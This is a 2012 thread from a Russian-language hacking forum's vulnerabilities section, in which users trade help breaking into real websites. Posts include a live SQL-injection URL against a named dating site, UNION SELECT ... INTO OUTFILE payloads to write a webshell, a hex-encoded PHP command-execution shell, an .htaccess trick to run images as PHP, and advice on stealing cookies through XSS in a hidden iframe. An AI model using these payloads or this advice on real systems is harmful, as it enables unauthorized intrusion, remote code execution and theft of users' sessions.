HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20321  
Старый 07.04.2012, 03:48
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем!

p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему.

p.p.s. теперь мне понятно:

Цитата:
Сообщение от None  
Все дело в том, что появлением молока корова, как впрочем, и все млекопитающие, обязана внутренним физиологическим процессам, таким как лактация и синтез. Благодаря этим процессам вымя, прежде чем произвести молоко всасывает с крови все необходимые для этого вещества. Одним из таких веществ и является белок казеин, именно благодаря ему молоко становиться белого цвета, точнее тем мелким частицам (мицеллам), которые он образует. К слову сказать, именно казеин является основным составляющим молока, ведь процент его содержания в нем достигает 70-90%, что согласитесь немало.
 
Ответить с цитированием

  #20322  
Старый 07.04.2012, 11:28
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Приветствую, при запросе ( search_result.php?search=1 ') выдаёт

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393

стоит ли ковырять дальше ?
 
Ответить с цитированием

  #20323  
Старый 07.04.2012, 11:41
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

нет.
 
Ответить с цитированием

  #20324  
Старый 08.04.2012, 00:52
namez2
Guest
Сообщений: n/a
Провел на форуме:
10263

Репутация: 0
По умолчанию

Вопрос такого плана.

Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой.

http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_wh o2='&input_bdsm_position=&input_age1=&input_age2=& input_country_id=0&input_state_id=0&input_city_id= 0

параметр input_who2

вот ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4
 
Ответить с цитированием

  #20325  
Старый 08.04.2012, 01:18
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

У меня маленький вопросец,

залил шел через скулю

открываю его, а мне пишет

Цитата:
Сообщение от None  
Forbidden
You don't have permission to access /uploads/shell.php on this server.
хотел создать свой .htaccess с содержимым

Цитата:
Сообщение от None  
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
 
Ответить с цитированием

  #20326  
Старый 08.04.2012, 11:58
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
хз. если ток искать другую директорию для заливки шелла.
 
Ответить с цитированием

  #20327  
Старый 08.04.2012, 13:18
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Pirotexnik  
Pirotexnik said:
А как слить куки на сниффер без переадресации?
site.com/index.php?id=[COLOR="Green"]"> в начале XSS, закрывать обработчик onerror и тег img не нужно.

Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте:

Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности (", " или "). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами.

Цитата:
Сообщение от eclipse  
eclipse said:
или через AJAX))
Домен сниффера отличается от домена XSS
 
Ответить с цитированием

  #20328  
Старый 08.04.2012, 20:06
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

Пытаюсь залить шелл через mysql(f_p =Y).

Мой запрос выглядит так:

Цитата:
Сообщение от None  
1'+union+select+1,2,3,4,5,union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+--+
Вылетает такая ошибка.

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',' at line 1
(Шелл на сайт уже заливал кто-то, сапа стоит)
 
Ответить с цитированием

  #20329  
Старый 08.04.2012, 20:12
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

попробуй этот код за хексить

получится 0x3c3f2073797374656d28245f524551554553545b27636d64 275d293b203f3e
 
Ответить с цитированием

  #20330  
Старый 08.04.2012, 20:16
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше...

Разобрался.

Цитата:
Сообщение от None  
1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23%20and%28select%2 0%225656%22%20INTO%20OUTFILE%20%22/www/domens/dir1/www/banner/mysql.php%22%29+--+
Так выводит 13 ошибку, а это - ошибка записи.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ